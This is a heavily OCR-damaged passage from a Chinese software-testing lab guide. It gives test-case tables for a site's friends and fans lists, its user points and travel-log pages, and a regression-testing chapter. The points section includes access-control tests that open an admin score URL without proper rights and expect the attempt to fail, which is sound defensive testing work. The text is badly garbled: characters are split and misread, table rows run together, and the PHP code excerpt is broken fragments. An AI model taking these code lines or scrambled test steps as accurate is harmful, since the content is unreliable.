“我 的 好 友 ” 列 表 


(1) 登录 网 站 

(2) 单 击 “ 我 的 空间 ”菜单 下 “我 的 
好 友 ” 

(3) 移动 鼠标 指针 到 “我 的 好 友 ” 
列表 中 头像 上 ,出 现 Tooltip 
后 单 击 头像 


该 好 友 被 删除 ,“ 我 的 好 友 ” 列 表 中 
不 再 显示 





(1) 登录 网 站 

(2) 单 击 “我 的 空间 ”菜单 下 “我 的 
好 友 ” 

(3) 移动 鼠标 指针 到 “我 的 好 友 ” 
列表 中 昵称 上 ,出 现 Tooltip 
后 单 击 昵称 


该 好 友 被 删除 ,“ 我 的 好 友 ” 列 表 中 
不 再 显示 





(1) 登录 网 站 (使 用 一 个 全 新 的 账 
号 登录 ) 

(2) 单 击 “ 我 的 空间 ”菜单 下 “我 的 
AE" 

(3) 观察 “我 的 好 友 ” 列 表 


列表 中 没有 好 友 ,样式 显示 正确 





CO 登录 网 站 (使 用 一 个 有 很 多 好 
友 的 账号 登录 ,超过 30 个 ) 
(2) 单 击 “ 我 的 空间 ?菜单 下 “我 的 

好 友 ” 
(3)“ 我 的 好 友 ” 列 表 中 能 翻 页 展 
示 所 有 的 好 友 


有 翻 页 功能 ,并 且 翻 页 功能 可 以 正 
常 使 用 





(1) 登录 网 站 

(2) 单 击 “我 的 空间 ?菜单 下 “我 的 
好 友 ” 

(3) 添加 一 个 没有 设置 头像 的 
好 友 

(4) 观察 “我 的 好 友 ” 列 表 


显示 正常 ,有 默认 头像 





| 等 待 我 批准 的 好 友 





列表 


CD 登录 网 站 

(2) 单 击 “ 我 的 空间 ”菜单 F“ 我 的 
好 友 ” 

(3) 观察 等 待 我 批准 的 好 友 列 表 


显示 正常 








(1) 登录 网 站 

(2) 单 击 “我 的 空间 ?菜单 下 “我 的 
好 友 ” 

(3) 在 等 待 我 批准 的 好 友 列 表 中 
移动 鼠标 指针 ,观察 鼠标 指针 
变化 





鼠标 指针 移动 到 头像 和 昵称 上 会 
变 成 小 手 形状 ,并 出 现 Tooltip“ 批 
准 请 求 " 和 “拒绝 请 求 ” 








实验 13 ”设计 好 友 /粉丝 白 盒 测试 用 例 “、235 
NA 


续 表 





试 


操作 步骤 


期 望 结果 


实际 测试 
(Pass/Fail) 





10 


12 


等 待 我 批准 的 好 友 
列表 


CD 登录 网 站 

(2) 单 击 “我 的 空间 ?菜单 下 “我 的 
好 友 ” 

(3) 在 等 待 我 批准 的 好 友 列 表 中 
移动 鼠标 指针 到 头像 上 , 单 击 
头像 


好 友 请 求 被 批准 ,成 为 用 户 的 好 
友 ,页面 自动 刷新 ,在 “我 的 好 友 ” 
列表 中 出 现 该 好 友 ,而 在 等 待 我 批 
准 的 好 友 列 表 中 消失 





(1) 登录 网 站 

(2) 单 击 “ 我 的 空间 ?菜单 下 “我 的 
好 友 ” 

(3) 在 等 待 我 批准 的 好 友 列 表 中 
移动 鼠标 指针 到 第 一 个 打 勾 
的 昵称 上 , 单 击 昵称 


好 友 请 求 被 批准 ,成 为 用 户 的 好 
友 , 页 面 自动 刷新 ,在 “我 的 好 友 ” 
列表 中 出 现 该 好 友 ,而 在 等 待 我 批 
准 的 好 友 列 表 中 消失 





CD 登录 网 站 

(2) 单 击 “ 我 的 空间 ?菜单 下 “我 的 
好 友 ” 

(3) 在 等 待 我 批准 的 好 友 列 表 中 
移动 鼠标 指针 到 第 二 个 打 叉 
的 昵称 上 , 单 击 昵称 


好 友 请 求 被 拒绝 ,页 面 自动 刷新 ， 
在 “我 的 好 友 ” 列 表 中 不 会 出 现 该 
好 友 ,等 待 我 批准 的 好 友 列表 中 也 
消失 ,在 推荐 栏 中 会 出 现 该 好 友 





同 测试 用 例 5 一 7, 这 里 不 再 写 出 





14 


15 


我 的 好 友 请 求 ,等 


“| 待 他 人 批准 列表 


16 





(1) 登录 网 站 

(2) 单 击 “ 我 的 空间 ”菜单 下 “我 的 
好 友 ” 

(3) 观察 我 的 好 友 请 求 , 等 待 他 人 
批准 列表 


列表 样式 显示 正常 





CD 登录 网 站 

(2) 单 击 “我 的 空间 ?菜单 下 “我 的 
好 友 ” 

(3) 移动 鼠标 指针 到 我 的 好 友 请 
OR E ,等待 他 人 批准 列表 中 头 
像 或 者 昵称 ,观察 鼠标 指针 


这 里 是 我 的 请 求 , 所 以 鼠标 指针 移 
动 上 去 没有 任何 操作 





(1) 登录 网 站 ,用 账号 sms/test123 
登录 

(2) 单 击 “ 我 的 空间 ”菜单 下 “我 的 
Hk" 

(3) 在 “好 友 推 荐 ”一 栏 单 击 添加 
一 个 好 友 , 如 李 娇 

COD 观察 两 个 列表 变化 


单 击 后 页 面 自动 刷新 ,然后 我 的 好 
友 请 求 ,等 待 他 人 批准 列表 出 现 李 
娇 的 信息 ,而 “好 友 推 荐 ”一 栏 没有 
李 娇 这 个 信息 了 





(1) 完成 测试 用 例 16 后 ,登录 李 
娇 的 账号 
(2) 观察 等 待 我 批准 的 好 友 列 表 





在 等 待 我 批准 的 好 友 列 表 中 显示 
测试 用 例 16 中 用 户 sms 的 信息 











同 测试 用 例 5 一 7 , 翻 页 测试 和 列表 样式 测试 





软件 测试 实验 实 训 指南 


续 表 





操作 步骤 


期 望 结果 


实际 测试 
CPass/Fail) 





19 


20 


21 


好 友 推 荐 


(1) 登录 网 站 

(2) 单 击 “ 我 的 空间 ”菜单 下 “我 的 
好 友 ” 

(3) 观察 “好 友 推 荐 ,有 兴趣 就 加 
我 吧 ...” 一 栏 


信息 和 样式 显示 正确 





(1) 登录 网 站 

(2) 单 击 “ 我 的 空间 ?菜单 下 “我 的 
好 友 ” 

(3) 移动 鼠标 指针 到 “好 友 推 荐 ， 
有 兴趣 就 加 我 吧 ...” 一 栏 用 户 
昵称 和 头像 ,观察 鼠标 指针 


鼠标 指针 变 成 小 手 形状 ,并 且 出 现 
Tooltip* 添 加 好 友 ” 





同 测试 用 例 5 一 7 , 翻 页 功能 和 样式 





22 


23 


24 


25 





我 关注 谁 


CD 登录 网 站 

(2) 单 击 “我 的 空间 ”菜单 下 “我 的 
关注 ” 

(3) 移动 鼠标 指针 到 “我 关注 谁 ” 
一 栏 用 户 昵称 和 头像 上 ,观察 
鼠标 指针 变化 


鼠标 指针 变 成 小 手 形状 ,并 且 出 现 
Tooltip“ tili X iE" 





CD 登录 网 站 

(2) 单 击 “ 我 的 空间 ?菜单 下 “我 的 
关注 ” 

(3) 移动 鼠标 指针 到 “我 关注 谁 ” 
一 栏 用 户 昵称 上 ,出 现 
Tooltip, 单 击 昵称 


取消 该 粉丝 的 关注 ,页 面 自 动 刷 
新 ,刷新 后 “我 关注 谁 ”列表 中 没有 
该 粉丝 ,在 “关注 推荐 ”一 栏 出 现 该 
粉丝 





(1) 登录 网 站 

(2) 单 击 “ 我 的 空间 ”菜单 下 “我 的 
Xu" 

(3) 移动 鼠标 指针 到 “我 关注 谁 ” 
一 栏 某 粉 丝 头 像 上 , 出现 
Tooltip, 单 击 该 头像 


取消 该 粉丝 的 关注 ,页 面 自动 刷 
新 ,刷新 后 “我 关注 谁 ?列表 中 没有 
该 粉丝 ,在 “关注 推荐 ”一 栏 出 现 该 
粉丝 














用 例 步骤 同 测试 用 例 5 一 7( 好 友 页 


面 换 成 关注 页 面 ) 





实验 13 ”设计 好 友 / 粉 丝 白 盒 测试 用 例 .237 
AA 


续 表 





操作 步骤 


期 望 结果 


实际 测试 
(Pass/Fail) 





26 


28 


29 


30 


谁 关 注 我 


(1) 登录 网 站 
(2) 单 击 “我 的 空间 ?菜单 下 “我 的 
关注 ” 


(3) 移动 鼠标 指针 到 “ 谁 关注 我 ” 
列表 用 户头 像 和 昵称 上 ,观察 
该 列表 


页 面 信息 显示 正确 ,在 谁 关注 我 列 
表 中 没有 头像 和 昵称 都 没有 操作 ， 
鼠标 指针 移动 上 去 单 击 不 会 有 任 
何 反 应 





COD 登录 网 站 (注册 一 个 新 账号 ) 
(2) IN UA NOE RN 


x 
(3) 观察 “ 谁 关注 我 ”列表 


没有 粉丝 关注 时 ,列表 中 没有 内 容 
显示 ,样式 显示 正常 





(1) 登录 网 站 (使 用 一 个 “ 谁 关 注 
我 ?列表 中 超过 30 个 粉丝 的 


账号 ) 
(2) 单 击 “ 我 的 空间 ?菜单 下 “我 的 | 使 用 
关注 ” 


(3) 观察 “ 谁 关注 我 ”列表 


有 翻 页 功能 ,并 且 该 功能 可 以 正常 





(1) 使 用 sms/testl23 账号 登录 


网 站 
(2) 另 外 一 个 浏览 器 使 用 1/ 
test123 账号 登录 网 站 
(3) 用 sms 的 账号 在 关注 推荐 一 
栏 找到 1, 单 击 关 注 
(4) "Ñ sms f lj 的 “我 的 关注 ” 
面 


sms 账号 中 “我 关注 谁 ”列表 中 显 
示 了 账号 的 用 户 信息 ,而 1 账号 中 
“ 谁 关注 我 ”显示 sms 的 粉丝 信 
息 ; 并 且 sms 和 1 两 个 账号 中 关 
注 推荐 一 栏 都 不 再 显示 彼此 的 
信息 





CD 执行 测试 用 例 29 
(2) 在 sms 账号 的 “我 关注 谁 ? 列 
表 中 单 击 1 的 昵称 取消 关注 


取消 成 功 ,在 sms 账号 的 “我 关注 
谁 ? 列 表 中 不 再 有 1 的 信息 ,在 1 
的 “ 谁 关 注 我 ?列表 中 不 再 有 sms 
的 信息 ; 并 且 sms A lj 的 关注 推 
荐 都 出 现 彼此 的 信息 





31 


32 


33 


34 





关注 推荐 


CD 登录 网 站 
(2) 单 击 “我 的 空间 ?菜单 下 “我 的 
关注 


(3) 移动 鼠标 指针 到 “关注 推荐 ” 
列表 用 户头 像 和 昵称 上 ,观察 
鼠标 指针 变化 


鼠标 指针 变 成 小 手 形状 ,出 现 
Tooltip “添加 关注 ” 





(1) 登录 网 站 
(2) 单 击 “我 的 空间 ?菜单 下 “我 的 
XiE" 


(3) 鼠标 指针 移动 到 “关注 推荐 ” 
一 栏 一 个 用 户 粉 丝 的 头像 上 ， 
单 击 该 头像 


添加 关注 成 功 ,页 面 自动 刷新 ,该 
用 户 在 “我 的 关注 ”列表 中 出 现 , 而 
在 “关注 推荐 "列表 中 消失 





(1) 登录 网 站 
(2) 单 击 “我 的 空间 ?菜单 下 “我 的 
关注 ” 


(3) 鼠标 指针 移动 到 “关注 推荐 ” 
列表 一 个 用 户 粉丝 的 昵称 上 ， 
单 击 该 头像 





添加 关注 成 功 ,页 面 自动 刷新 ,该 
用 户 在 “我 的 关注 ”列表 中 出 现 , 而 
在 “关注 推荐 ”列表 中 消失 











样式 测试 和 翻 页 功能 测试 ,测试 用 例 步 又 同 27、28 





238。” 软件 测试 实验 实 训 指南 
Ne 


x 专家 点 评 


好 友和 粉丝 许多 测试 点 是 类 似 的 ,不 过 有 一 点 能 区 别 开 , 就 是 加 别人 好 友 需 要 对 方 同意 
才能 真正 加 成 功 ,否则 只 能 在 对 方 的 等 候 批 准 列表 中 ; 而 关注 别人 是 不 需要 对 方 批准 的 , 想 
关注 谁 都 可 以 。 


W 拓展 训练 


下 载 本 书 配套 的 好 友 粉 丝 源码 ,进行 更 深入 的 好 友 粉 丝 模块 白 盒 测 试用 例 设 计 。 
提醒 ; 可 以 在 http://collegecontest. roqisoft. com/awardshow. html 中 查阅 历年 全 国 
高 校 大 学 生 在 这 些 网 站 中 发 现 的 更 多 测试 用 例 设计 。 





实验 13 ”设计 好 友 / 粉 丝 白 盒 测试 用 例 
读书 笔记 
44 e$; ao 


读书 笔记 Name: Date: 








励志 名 句 : Do not all you can, spend not all you have; believe not all you 


hear s and tell not all you know. 





不 要 为 所 能 为 ,不 要 花 尽 所 有 ,不 要 全 信和 所 闻 ,不 要 言 尽 所 知 。 


















































设计 积分 /游记 白 盒 测试 用 例 | 


|€&5Hfü ) 

本 实验 白 盒 测 试用 例 设 计 实 验 选 用 智慧 绍兴 的 用 户 积 分 与 个 人 
游记 功能 代码 块 进行 设计 。 积 分 在 许多 网 站 应 用 中 都 有 ,个 人 游记 主 
要 用 于 旅游 回顾 。 通 过 对 代码 分 析 与 测试 用 例 的 设计 ,带领 读者 感受 
如 何 阅读 源 程序 ,以 及 如 何 从 源 程序 的 角度 出 发 设计 测试 用 例 。 


14.1 用 户 积分 功能 介绍 


下 面 通过 用 户 积分 /个 人 游记 的 案例 设计 白 盒 测试 用 例 。 
先 , 使 用 测试 账号 登录 网 站 ,例如 登录 sms/test123 这 个 测试 账号 ; 
登录 后 单 击 “ 我 的 空间 ”一 “积分 管理 ”, 可 以 看 到 “积分 管理 "页面 ， 
如 图 14-1 所 示 。 
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,第 二 名 加 70 积 分 ,第 三 名 加 50 积 分 
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图 14-1 “积分 管理 ”页面 


实验 14 ”设计 积分 /游记 白 盒 测 试用 例 


“积分 管理 ”页 面 有 描述 获得 积分 的 两 种 途径 。 

(1) 每 天 登录 ,进入 个 人 游记 , 单 击 金币 获取 积分 (每 天 仅 可 积 一 分 ) 。 

(2) 参加 优秀 作品 摄影 大 赛 的 获奖 选手 ,系统 会 加 分 。 第 一 名 加 100 积分 ,第 二 名 加 70 
积分 ,第 三 名 加 50 积分 。 

第 (1) 种 途径 是 用 户 可 以 自己 操作 来 获得 ,第 (2) 种 途径 则 是 管理 员 后 台 操作 获得 的 ,所 
以 前 台 只 能 展示 第 (1) 种 途径 的 功能 。 按 照 提示 进入 “个 人 游记 ”页 面 ,如 图 14-2 所 示 ,其 右 
侧 为 我 的 积分 。 





智慧 首页 SEM RAIS 到 此 一 游 SKEF 。 我 的 空间 IRER 











图 14-2 “个 人 游记 ”页 面 


14.2 ”用户 积分 代码 分 析 


了 解 了 积分 模块 的 相关 功能 ,下 面 需 要 对 用 户 积分 模块 的 代码 有 深入 的 了 解 。 积 分 模 
块 代码 如 图 14-3 所 示 。 

根据 代码 ,可 以 画 出 用 户 积 分 流程 图 (使 用 图 形 表示 算法 是 一 种 极 好 的 思路 ) ,两 种 积分 
流程 如 图 14-4 所 示 。 

对 代码 有 了 深入 了 解 后 ,就 可 以 开始 设计 用 户 积分 模块 的 白 盒 测 试用 例 了 。 根 据 
流程 图 和 14. 1 节 的 实验 介绍 的 测试 方法 设计 测试 用 例 , 这 里 可 以 使 用 语句 覆盖 和 条 
件 覆 盖 方 法 。 

注意 : 我 们 在 代码 中 通过 静态 分 析 法 发 现 了 在 管理 员 模 块 有 管理 员 页 面 的 链接 的 注释 
XXXX/blog/admin/score. php? action==add&.scoreid 一 XXX&.score=XXX, 由 此 可 以 设计 
安全 性 测试 的 测试 用 例 。 
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XXXX/blog/admi. 
new S 


StodayAlreadyScored = $Score Model-» 
/ /echo $todayAlready d; 
(IStodayAlreadyScored)( 


$Score Model-»: e(Suid); 


H 
SreturnURL = './mytravel.php?rnde'. 
Direct(SreturnURL) ; 


nterface URL 
if($action-- 'add')( 
— = t($_GET['scoreid']) ? 
$score = t*(S_GET['score']) ? 
SScore Model-»s 
$returnURL = $ SERVER['HTTP REFERER'] 
(SreturnURL) ; 


*= 


tion=add&scoreid-XXX&score=XXX 


$ GET['scoreid']) 


(S. GET['score']) : 1 
(Sscoreid, $score); 
?rnd= O. 


core.php?action=sub&scoreid=XXX8sc 


Sscoreid = _GET['scoreid']) ? 

Sscore - GET['score']) ? 

SScore Model-»subs 

SreturnURL = $ SERVER['HTTP. RE 可 
(SreturnURL); 





(S. GET['scoreid']) 


aL($ GET['score']) : 1 
($scoreid, $score); 
?rnde* rond). 


图 14-3 积分 模块 代码 
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用 户 单 击 积分 


























录 成 功 ( 用 户 名 是 提示 错误 
理 正确 、 密 码 是 可 提示 错误 “上 一 
正确 )? 
提示 信息 “| | 
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管理 员 给 用 户 积分 





















是 否 登 录 成 功 (用 户 名 是 
否 正 确 、 密 码 是 否 


正确 )? 


提示 错误 



































图 14-4 用 户 积分 流程 图 
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14.3 设计 用 户 积分 测试 用 例 
用 户 积分 测试 用 例如 表 14-1 所 示 。 
表 14-1 用 户 积分 测试 用 例 
序 实际 测试 
号 W ox 操作 步 又 期 望 结果 (Pass/Fail) 
(1) 输入 测试 账号 sms/test123 登录 
1 网 站 登录 成 功 
| D 单 击 “登录 ” 
(1) 输入 账号 sms/test123 登录 网 站 en 3 
2 | 登录 人 登录 失败 ,提示 登录 错误 信息 
š CD 输入 账号 sms/123123 登录 网 站 “| 登录 失败 ,提示 “密码 错误 ,请 
D 单 击 “登录 ” 重新 登录 ” 
(1) 登录 网 站 (使 用 当天 未 积分 的 账号 
登录 ) 页 面 显示 正常 ,积分 图 片 与 提 
(2) 单 击 进入 “个 人 游记 "页 面 示 都 是 未 积分 的 样式 
(3) 观察 页 面 
(1) 登录 网 站 (使 用 当天 未 积分 的 账号 
登录 ) 
(2) 单 击 进入 “个 人 游记 "页 面 原 浏览 器 中 积分 成 功 ,并 且 页 
(3) 复制 该 页 面 链接 ,在 另 一 个 浏览 器 | 面 自动 刷新 ,用 户 积分 加 1 
打开 并 且 登 录 
(4) 在 原 浏览 器 单 击 积分 
CD 登录 网 站 (使 用 当天 已 经 积分 过 的 
账号 登录 ) 鼠标 指针 没有 变 成 小 手 形状 ， 
用 户 积分 (2) 单 击 进入 “个 人 游记 "页 面 单 击 没有 作用 ,积分 不 会 加 1 
(3) 单 击 积分 图 片 进 行 积分 
| 原 浏览 器 积分 加 1, 新 的 浏览 
; (1) 执行 测试 用 例 5 器 单 击 后 刷新 页 面 提示 已 经 
(2) 在 另 一 个 浏览 器 单 击 积分 获得 过 积分 ,积分 只 刷新 成 最 
新 积分 值 ,不 会 再 加 1 
z (1) 登录 一 个 未 积分 过 的 账号 
8 (2) 单 击 进入 * 个 人 游记 ”页面 页 面 刷新 ,积分 只 加 1 
(3) 连续 快速 单 击 两 次 积分 
NU CD 注册 一 个 新 账号 
(2) 登录 页 面 样式 显示 正常 ,并 且 积 分 
(3) 单 击 进入 * 个 人 游记 "页面 数值 显示 0 
(4) 观察 页 面 
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续 表 





操作 步骤 


实际 测试 
(Pass/Fail) 





10 


管理 员 积 分 


OD 用 管理 员 账 号 登录 

(2) 进入 “积分 管理 ”页 面 

(3) 找到 sms 账号 ,为 这 个 用 户 加 50 分 

(4) 登录 sms 账号 ,进入 “个 人 游记 ” 
页 面 


sms 的 积分 在 原 基础 上 增加 
f 50 





OD 用 管理 员 账 号 登录 

(2) 进入 “积分 管理 ”页面 

(3) 找到 sms 账号 ,为 这 个 用 户 减 去 10 分 

(4) 登录 sms 账号 ,进入 “个 人 游记 ” 
页 面 


sms 的 积分 减 了 10 分 





12 


13 


管理 员 积 分 安全 性 


| 测试 


14 


15 





(1) 未 登录 状态 

(2) 打开 链接 http://www. roqisoft. 
com/zhsx/blog/admin/score. php? 
action = add&-scoreid = XXX&-score 
一 XXX (XXX 要 换 成 正确 的 数值 ) 

(3) 观察 能 否 加 分 成 功 


跳 转 到 登录 页 面 ,加 分 失败 





(1) 登录 状态 

(2) 打开 链接 http://www. roqisoft. 
com/zhsx/blog/admin/score. php? 
action 一 add&-scoreid = XXX6&-score 
=XXX(XXX 要 换 成 正确 的 数值 ) 

(3) 观察 能 否 加 分 成 功 


加 分 失败 





(1) 未 登录 状态 

(2) 打开 链接 http://www. roqisoft. 
com/zhsx/blog/admin/score. php? 
action = sub&scoreid = XXX&-score 
二 XXX(XXX 要 换 成 正确 的 数值 ) 

(3) 观察 能 否 减 分 成 功 


跳 转 到 登录 页 面 , 减 分 失败 








(1) 登录 状态 

(2) 打开 链接 http://www. roqisoft. 
com/zhsx/blog/admin/score. php? 
action = sub&.scoreid = XXX8& score 
二 XXX(XXX 要 换 成 正确 的 数值 ) 

(3) 观察 能 否 减 分 成 功 





减 分 失败 











DS 专家 点 评 


用 户 积分 设计 要 注意 防止 用 户 纂 改 URL 去 获得 更 高 积分 。 同 时 需要 注意 普通 用 户 能 
不 能 拿 到 管理 员 权限 给 自己 任意 加 分 ,或 者 给 别人 任意 减 分 。 
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bU 
14.4 个 人 游记 功能 介绍 


上 面 所 讲 的 用 户 积分 ,普通 用 户 只 有 在 “个 人 游记 ”页 面 可 以 积分 ,下 面 就 来 讲解 个 人 游 
记 模 块 的 白 盒 测试 用 例 设计 。 

在 “我 的 空间 ”菜单 下 , 单 击 “ 个 人 游记 ”, 即 可 进入 “个 人 游记 "页面, 参见 图 14-2。 

在 “个 人 游记 ”页 面 顶 部 可 以 看 到 好 友 数 、 关 注 数 和 赞 数 ; 下 面 内 容 记 录 了 用 户 的 游记 
列表 ,显示 了 游记 图 片 ,游记 标题 、 写 游记 的 时 间 ,阅读 次 数 、 评 论 数 和 游记 的 部 分 内 容 , 单 击 
图 片 或 者 标题 可 以 进入 游记 的 详细 页 面 。 


14.5 个 人 游记 代码 分 析 


个 人 游记 代码 如 图 14-5 所 示 。 


j(guid)3 


(Suid); 


(Suid); 





图 14-5 “个 人 游记 ”代码 


“个 人 游记 ”代码 中 , Score_Model-> isTodayScored 是 获取 当前 用 户 的 积分 数 ; 
getMyFensiNum 是 获取 当前 用 户 的 粉丝 数 ; getOneUserApprovedFriendNum 是 获取 当 
前 用 户 的 好 友 数 ,对 应 页 面 顶 部 的 几 个 数值 ,测试 的 时 候 需 要 测试 这 些 数值 是 否 正 确 ; 
getLogsForHome( "AND author = $ uid ORDER BY date DESC". 1. 0) 查 询 个 人 所 有 
游记 ,这 里 就 需要 对 游记 列表 测试 ;“getView('homehead '); "* getView( 'homebar') ;" 
*getView( 'travel? ; "*getView('homefooter') ; ”分 别 是 页 面 头 部 .导航 条 游记 、 页 脚 的 显示 ， 
需要 测试 显示 是 否 正常 。 


14.6 设计 个 人 游记 测试 用 例 


对 代码 有 了 深入 理解 后 ,可 以 开始 对 个 人 游记 进行 白 盒 测 试用 例 设 计 , 如 表 14-2 所 示 。 
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表 14-2 个 人 游记 测试 用 例 设计 





操作 步骤 


期 望 结果 


实际 测试 
(Pass/Fail) 





三 


页 面 显 示 测 试 


(1) 登录 sms/test123 
(2) 进入 “个 人 游记 ”页面 
(3) 观察 页 面 顶 部 .底部 .导航 条 


页 面 顶部 、 底 部 .导航 条 都 显 
示 正 常 ,样式 正确 





数值 测试 (好 友 数 ) 


(1) 登录 sms/test123 

(2) 进入 “个 人 游记 "页面 

(3) 记录 当前 好 友 数 X 

(4) 去 “我 的 好 友 ” 页 面 , 添 加 1 为 好 友 
(5) 查看 “个 人 游记 ”页 面 好友 数 


好 友 数 依旧 显示 X 





CD 执行 测试 用 例 2 

(2) 登录 上 账号 ,同意 sms 的 好 友 请 求 

(3) 回 到 sms 账号 的 “个 人 游记 ?页面 ， 
查看 好 友 数 


好 友 数 显示 X+1 





(1) 登录 sms 账号 

(2) 进入 “个 人 游记 ”页 面 记录 当前 好 
AY 

(3) 到 “我 的 好 友 ” 页 面 ,删除 一 个 好 
友 test 

(4) 回 到 “个 人 游记 "页面 查 看 好 友 数 


好 友 数 变 成 了 一 1 





CD 执行 测试 用 例 4 

(2) 在 另 一 个 浏览 器 登录 1 账号 

(3) 1 账号 进入 “我 的 好 友 ” 页 面 , 删 除 
好 友 sms 

(4) 回 到 sms 账号 的 “个 人 游记 ”页 面 ， 
查看 好 友 数 


好 友 数 显示 为 Y 一 2 





| 数值 测试 (关注 数 ) 





(1) 登录 sms 账号 
(2) 进入 “个 人 游记 ”页 面 记 录 关 注 数 


为 X 
(3) 单 击 进 入 “我 的 关注 ”页 面 
(4) 关注 好 友 lj 
(5) 回 到 “个 人 游记 ”页 面 查 看 关注 数 


关注 数 依旧 为 X 





(1) 登录 test 账号 

(2) 在 test 账号 中 关注 sms 

(3) 登录 sms 账号 (原本 关注 数 X) 
(4) 进入 “个 人 游记 ”页 面 查看 关注 数 


KERER XH 





(1) 登录 sms 

(2) 在 “个 人 游记 ”页 面 查看 关注 数 为 
X 十 1 

G) 进入 “我 的 关注 页面 ,删除 1; 

(4) 回 到 “个 人 游记 ”页 面 查看 关注 数 


关注 数 依旧 显示 X 十 1 








(1) sms 账号 中 关注 数 为 X 十 1 

(2) 登录 test 账号 

(3) 在 test 账 号 中 删除 刚刚 关注 的 sms 

(4) 查看 sms “个 人 游记 ”页 面 的 关 
注 数 


KERER X 
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Sk 


" 实际 测试 
p 测试 点 操作 步 又 muss (Pass/Fail) 


(1) 登录 sms 账户 

(2) 进入 “个 人 游记 ”页 面 , 赞 数 显示 X 

(3) 进入 “积分 管理 ”页 面 自己 不 能 给 自己 点 先 ,“ 个 人 

(4) 单 击 sms 账户 对 应 的 账户 的 赞 | 游记 ”页 面 的 赞 数 依旧 为 X 
图 标 

(5) 查看 “个 人 游记 "页面 的 赞 数 

(1) 登录 sms 账户 

(2) 进入 “个 人 游记 "页面, 赞 数 显 示 X 

数值 测试 ( 赞 数 ) |(3) 登录 了 账户 











T (4) 进入 “积分 管理 "页面 “个 人 游记 ”页 面 的 赞 数 为 
(5) 单 击 sms 账户 对 应 的 账户 的 赞 |X 十 1 
图 标 


(6) 回 到 sms 账户 “个 人 游记 "页面 , 刷 
新 ,观察 “个 人 游记 ”页 面 的 赞 数 




















, (D) 再次 执行 测试 用例 1 Biologia 
(2) dPRA- Aie SC EE. 
18 | 数值 测试 (积分 | 参考 用 户 积分 测试 用 例 表 
CD 注册 一 个 新 账号 
u (2) 登录 个 人 游记 为 0, 页 面 显示 正 
(3) 进入 “个 人 游记 ”页面 常 ,没有 样式 问题 
N CD 查看 页 面 
游记 列表 中 显示 正常 ,游记 图 
(DERE s E 片 \ 标 题 .发 布 时 间 、 阅 读 次 
15 (2) 进入 个 人 游记 页 面 数 .评论 数 和 部 分 游记 内 容 显 
(3) 查看 游记 列表 LIÉ E I 
一 | 游记 列表 测试 C GEN GUES CICER 20 JO MUERTA UU 
16 (2) 进入 个 人 游记 页 面 R I 
Ú 
" S 并 且 翻 页 功能 可 以 正常 使 用 
(1) 登录 sms 账号 
(D 进入 “个 人 游记 ”页面 最 新 发 布 的 游记 展示 在 列表 
17 O 单 击 “ 点 我 写 游记 ”, 写 一 篇 新 的 | 第 一 个 ,游记 列表 按照 时 间 倒 
游记 序 显示 


(4) 发 布 后 , 回 到 “个 人 游记 ”页 面 




















ELI] 


个 人 游记 一 般 要 测试 到 游记 是 否 能 正常 显示 。 如 果 游 记 多 ,需要 测试 能 否 正 常 翻 
页 。 另 外 ,需要 测试 能 否 方便 地 建立 新 的 游记 ,或 修改 已 有 游记 ,以 及 能 不 能 将 游记 设 为 
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qii 拓展 训练 


下 载 本 书 配套 的 用 户 积 分 和 个 人 游记 源码 ,进行 更 深入 的 积分 游记 模块 白 盒 测 试用 例 
设计 。 

提醒 : 可 以 在 http://collegecontest. roqisoft. com/awardshow. html 中 查阅 历年 全 国 
高 校 大 学 生 在 这 些 网 站 中 发 现 的 更 多 测试 用 例 设 计 。 


实验 14 ”设计 积分 /游记 白 盒 测试 用 例 
读书 笔记 
44 e$: ^4; e@; «4; e$; «4: o6: «4: e$: ^4; e: ^4; ed: 


读书 笔记 Name: Date: 








励志 名 句 : Fear not the futures weep not for the past. 





不 要 为 未 来 担忧 ,不 要 为 过 去 悲 泣 。 
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回归 测试 作为 软件 生命 周期 的 一 个 组 成 部 分 ,在 整个 软件 测试 过 
程 中 占有 很 大 的 工作 量 比 重 ,软件 开发 的 各 个 阶段 都 会 进行 多 次 回归 
测试 。 在 渐进 和 快速 迭代 开发 中 ,新 版 本 的 连续 发 布 使 回归 测试 进行 
得 更 加 频繁 ; 而 在 极端 编程 方法 中 ,更 是 要 求 每 天 都 进行 若干 次 回归 
测试 。 因 此 ,通过 选择 正确 的 回归 测试 策略 来 提高 回归 测试 的 效率 和 
有 效 性 是 非常 有 意义 的 。 

通过 本 实验 的 学 习 , 软 件 测试 工程 师 能 自己 设计 相对 完备 的 回归 
测试 类 测试 用 例 ,方便 自己 或 他 人 执行 这 些 测试 用 例 ,通过 经 典 测试 
用 例 的 设计 展示 ,让 每 位 读者 体会 设计 思路 。 


15.1  AutoDesk 回归 测试 项 目 总 述 


回归 (regression) 测 试 是 指 修改 了 旧 代 码 后 ,重新 进行 测试 以 确 
认 修 改 没 有 引入 新 的 错误 或 导致 其 他 代码 产生 错误 。 自 动 回 归 测 试 
将 大 幅 降低 系统 测试 .维护 升级 等 阶段 的 成 本 。 回 归 测 试 作为 软件 生 
命 周期 的 一 个 组 成 部 分 ,在 整个 软件 测试 过 程 中 占有 很 大 的 工作 量 比 
重 , 软 件 开发 的 各 个 阶段 都 会 进行 多 次 回归 测试 。 


15.2 ”回归 测试 设计 思路 


回归 测试 最 保险 的 办 法 是 回归 全 部 用 例 ,这 种 方法 最 安全 ,但 是 
成 本 最 大 。 回 归 测 试 还 可 以 选择 部 分 测试 ,定性 分 析 代码 改动 有 哪些 
影响 、 代 码 改 动 的 文件 /模块 和 其 他 文件 /模块 的 依赖 性 ,然后 选择 被 
影响 到 的 文件 /模块 相应 的 测试 用 例 ,这 种 方法 的 好 处 是 不 需要 消耗 
大 量 的 时 间 和 人 力 。 本 实验 使 用 的 就 是 后 一 种 方案 ,通过 修改 的 代码 
分 析 哪 些 需要 测试 ,哪些 不 需要 测试 ,快速 定位 因 代 码 改 动 可 能 带 来 
的 问题 。 
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15.3 ”设计 回归 测试 用 例 


详细 回归 测试 用 例 (此 为 英文 测试 用 例 ) 设 计 如 表 15-1 所 示 。 


表 15-1 AutoDesk Regression Test Case 














Feature What To Test What NOT to Test Pass/Fail 
Store Selection AN stores but the two listed in (ol Mae 
Column C 
Autodesk Maya 
Quick Links Link is functional Correctness of link name 





Link directs user to the right page| Spelling 
Link shows the right number of 
applications 








Best Sellers Link is functional Correctness of link name 
Link directs user to the right page| Spelling 

Link shows the right number of 
applications 





























Search Is functional 
Search result are correct 
Show All link 
Application-Selection | Application is clickable Correctness of Thumbnail 
Link is functional Correctness of application name 
Correctness of description 
Reviews display on page after 
ons entering-all reviews need to be 
"TEM Free Application can be down- š 
Application review and accepted by appstore 


